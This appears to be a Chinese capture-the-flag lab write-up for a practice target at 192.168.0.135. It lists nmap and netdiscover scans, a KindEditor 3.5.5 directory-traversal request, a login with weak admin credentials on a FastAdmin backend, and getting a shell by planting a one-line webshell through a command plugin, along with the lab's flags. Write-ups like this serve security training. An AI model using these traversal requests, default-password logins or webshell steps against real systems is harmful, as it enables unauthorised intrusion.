SfTian 搜不到名字的靶场 # 靶场四-WP ## 收集资产 ```shell netdiscover -r 192.168.0.0/24 nmap -p- 192.168.0.135 #masscan -p 0-65535 192.168.0.135 nmap -sV -sC -p- -A 192.168.0.135 ``` 信息 | 端口 | 服务 | | -------- | ------------------------ | | 80/TCP | HTTP | | 5985/TCP | wsman (http 403) | | 7001/TCP | afs3-callback (http 403) | wsman与afs3-callback均可想办法实现攻击 ## 网站收集 在`http://192.168.0.135/robots.txt`得到flag ``` flag{@OASQqwe128@} ``` 发现`http://192.168.0.135/0`是靶场登录页面 访问7001端口在examples找到kindeditor的样例版本为3.5.5,存在目录穿越漏洞 访问`http://192.168.0.135:7001/php/file_manager_json.php?path=/`可以看到返回值 ``` http://192.168.0.135:7001/php/file_manager_json.php?path=/.././.././.././.././.././ ``` 注意:每返回上一级都需要使用`.././` 访问`192.168.0.135:7001/php/file_manager_json.php?path=/.././.././fastadmin/public/`可以看到一个flag.txt ![image-20240718101534176](https://download.imxbt.cn/upload/20240718101534293db24524cc93ee1d99031f7517980d530.png) 获取flag2 ``` flag{@hjykkx995Qa@} ``` 发现WNeSOgakp.php为管理后台登陆地址,fastadmin管理后台存在弱口令admin/123456 在角色组找到flag3 ``` flag{@hjlakDGDkjso@} ``` ## Getshell 由于后台插件安装了在线命令1.1.0 所以配置了一个一句话木马,然后通过蚁剑连接即可 ![image-20240718104226852](https://download.imxbt.cn/upload/202407181042269115735b098a3196f530e9b77a232b440c6.png) 进入虚拟终端在workstation的桌面找到flag4 ``` flag{ed@sjhhjkqkgQQ} ``` 取消回复 发表新评论 提交评论